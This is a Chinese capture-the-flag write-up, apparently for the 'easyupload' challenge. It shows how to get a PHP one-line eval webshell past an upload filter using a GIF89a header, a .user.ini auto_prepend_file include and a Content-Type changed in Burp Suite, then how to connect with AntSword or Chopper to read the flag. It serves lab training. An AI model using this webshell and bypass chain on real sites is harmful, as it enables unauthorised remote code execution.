easyupload及BurpSuite抓包、改包、放包

这篇具有很好参考价值的文章主要介绍了easyupload及BurpSuite抓包、改包、放包。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

很明显的文件上传题

easyupload及BurpSuite抓包、改包、放包

如果你直接传一句话木马是不行的,无论是图片格式还是文本格式,都会被检测到

要么提示文件有问题

 easyupload及BurpSuite抓包、改包、放包

要么提示文件类型有问题

 easyupload及BurpSuite抓包、改包、放包

 这里需要绕过

第一点

一句话木马里肯定不能有php字样, <?php @eval($_POST['1']);?> 这种是不行的

可以用这种  <?=eval($_REQUEST['cmd']);?>

第二点

在文件头部添加一个图片的文件头来绕过

合起来一句话木马内容就是

GIF89a
<?=eval($_REQUEST['cmd']);?>

easyupload及BurpSuite抓包、改包、放包

将这个文本存为.jpg格式

第三点

这里还需要提前上传一个.user.ini文件

内容如下

GIF89a
auto_prepend_file=a.jpg

 easyupload及BurpSuite抓包、改包、放包

 我们可以借助.user.ini让所有php文件都“自动”包含某个文件,这个文件可以是一个正常php文件,也可以是一个包含一句话木马的webshell。

OK,做好这三点后,我们需要先上传.user.ini文件,再上传a.jpg,最后用蚁剑或者菜刀去连接

我们可以看到直接上传.user.ini也是不行的

easyupload及BurpSuite抓包、改包、放包

 这里需要先用BurpSuite抓包,修改类型后再放包,便可上传成功

下面先简单介绍一下用BurpSuite进行简单的抓包、改包、放包

抓包:

在Proxy里点击Open browser

easyupload及BurpSuite抓包、改包、放包

再将intercept打开(拦截请求包)

easyupload及BurpSuite抓包、改包、放包

当我们访问这个网站时就会有反馈,这里先直接放,一直点击Foward就好easyupload及BurpSuite抓包、改包、放包

 easyupload及BurpSuite抓包、改包、放包

 页面加载出来后,我们在这里上传刚才做好的.user.ini文件

easyupload及BurpSuite抓包、改包、放包

改包:

将 Content-Type: application/octet-stream 修改为 Content-Type: image/jpgeasyupload及BurpSuite抓包、改包、放包

放包:

 修改后点击两次Foward放包,可以看到文件上传成功easyupload及BurpSuite抓包、改包、放包

 接下来我们上传a.jpg,这个无论在哪里都可以直接上传

(建议用火狐浏览器,方便找到文件上传到哪里去了,这个路径问题很重要,路径没对一会儿用蚁剑连会提示返回值为空

 easyupload及BurpSuite抓包、改包、放包

上传成功

用F12打开调试器选择网络查看上传文件的地址 (如果是空白就点击重新载入)

 easyupload及BurpSuite抓包、改包、放包

 这个地址真的很重要!!!不能用那个网站本身的网址,也不能用Referer的那个

正确地址   http://223.112.5.156:57370/uploads/index.php

错误地址   http://223.112.5.156:57370/index.php

最后就是用蚁剑或者菜刀来连接了

右键添加数据

easyupload及BurpSuite抓包、改包、放包

 easyupload及BurpSuite抓包、改包、放包

 蚁剑可以先测试一下连接easyupload及BurpSuite抓包、改包、放包

 菜刀直接添加easyupload及BurpSuite抓包、改包、放包

 都是在根目录下拉找到flag文件的

easyupload及BurpSuite抓包、改包、放包

easyupload及BurpSuite抓包、改包、放包

 cyberpeace{9cf9f5742497791c16630fdf328ecf60}easyupload及BurpSuite抓包、改包、放包

 下面是用错误地址的报错

easyupload及BurpSuite抓包、改包、放包

easyupload及BurpSuite抓包、改包、放包文章来源地址https://www.toymoban.com/news/detail-444081.html

到了这里,关于easyupload及BurpSuite抓包、改包、放包的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • Kali Linux中BurpSuite工具抓包详解

    上一个教程我给大家带来了Kali Linux中BurpSuite工具爆破密码详解:Kali Linux中BurpSuite工具爆破密码详解_SXFourstar.布袋的博客-CSDN博客 而在本次教程中,我会详细保姆级教大家如何在kali Linux操作系统上使用自带工具BurpSuite进行抓包, 个人比较推荐在Kali Linux系统的BurpSuite工具进行

    2024年04月26日
    浏览(34)
  • 使用burpsuite抓包 + sql工具注入 dvwa初级靶场

    记录一下自己重新开始学习web安全之路②。 1.工具准备 sqlmap + burpsuite 2.浏览器准备 火狐浏览器 + 设置代理。 首先,先设置一下火狐浏览器的代理 http代理地址为127.0.0.0.1 ,端口为8080 3.burpsuite 准备 将burpsuite的抓包功能打开。 注:burpsuite 不抓127.0.0.1 /dvwa-master的包,所以需要

    2024年02月07日
    浏览(42)
  • (详解)如何为模拟器安装Burpsuite证书并抓包

    ✅作者简介:CSDN内容合伙人、信息安全专业在校大学生🏆 🔥系列专栏 :网络协议分析-抓包 📃新人博主 :欢迎点赞收藏关注,会回访! 💬舞台再大,你不上台,永远是个观众。平台再好,你不参与,永远是局外人。能力再大,你不行动,只能看别人成功!没有人会关心

    2023年04月16日
    浏览(40)
  • Burpsuite联动Proxifier抓包pc端微信小程序

    工具Proxifier以及burpsuite Proxifier下载地址 https://www.mustdown.com/software/13717.html 以上是破解版汉化版的下载地址,也可以去Proxifier官网下载30天的试用版本下载地址如下 https://www.proxifier.com Proxifier配置 配置文件--代理规则--添加 名称随意填写 应用程序填写WeChatAppEx.exe 动作选择Pro

    2024年02月01日
    浏览(54)
  • 微信小程序抓包-夜神模拟器结合BurpSuite抓包(可用于现在最新版本微信)

    2023年3月23日18.37.46:很多人说网络错误,目前我再次自己试过了,都没有出现这个问题,如果害怕出现网络异常等情况,就不要看下去了 之前总是通过电脑来抓包,时常失效,这里就用夜神模拟器配合Burp来抓包 也可以参考这位博主的文章 Fiddler+Proxifier进行PC端微信小程序抓包 通过Fi

    2024年02月09日
    浏览(88)
  • 【App渗透】用BurpSuite抓包安卓手机app内容(详细)

    很多情况下,在电脑的手机模拟器上面做app测试会存在大大小小的bug或者各种坑,而且有些模拟器很不方便,非常不好用。网上的教程虽然多,但是大部分都是两年前的甚至更晚的,跟着一步步来也是会错。 为了避免这种情况的发生,所以有了这篇文章。 在本机上面做app渗

    2024年02月11日
    浏览(39)
  • Day1使用Burpsuite抓包工具抓包,改变UA头使得手机和pc端界面互相转换

    1.前期工作:安装Burpsuite工具这里网上有许多教程,大致步骤如下: 找到安装包然后解压缩,然后双击 安装jdk,然后就是配置环境变量,如果是默认jdk安装路径没有更改路径的话就是跟如下一样 配置如下: (1)JAVA_HOME 变量值填写JAVA安装的路径,我的是C:Program FilesJavajd

    2024年02月10日
    浏览(40)
  • 【burpsuite安全练兵场-服务端8】文件上传漏洞-7个实验(全)

       博主:网络安全领域狂热爱好者(承诺在CSDN永久无偿分享文章)。 殊荣:CSDN网络安全领域优质创作者,2022年双十一业务安全保卫战-某厂第一名,某厂特邀数字业务安全研究员,edusrc高白帽,vulfocus、攻防世界等平台排名100+、高校漏洞证书、cnvd原创漏洞证书等。 擅长:

    2024年02月02日
    浏览(44)
  • 攻防世界easyupload (web新手)

    典型的文件上传,本题涉及知识点 文件上传漏洞 .user.ini绕过 其实这个题目是文件上传漏洞中相对来说不是很常见的题目,说实话也是涉及了我的知识盲区,在此之前我对文件上传漏洞有一些总结如下,都尝试过后发现没有能用的。 1. JavaScript 防御 检测发生在浏览器端(本地

    2023年04月16日
    浏览(40)
  • 攻防世界-WEB-easyupload

    1.新建.user.ini文件,内容如下 GIF89a auto_prepend_file=a.jpg 2.上传该文件,并用burp抓包,将Content-Type: application/octet-stream修改为 Content-Type: image/jpg 3.放包,结果如下 4. 新建a.txt文件,内容为 GIF89a ?=eval($_REQUEST[\\\'cmd\\\']);? 保存后将文件后缀修改为.jpg 5.直接上传该文件即可成功上传 PS:按

    2024年02月09日
    浏览(36)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包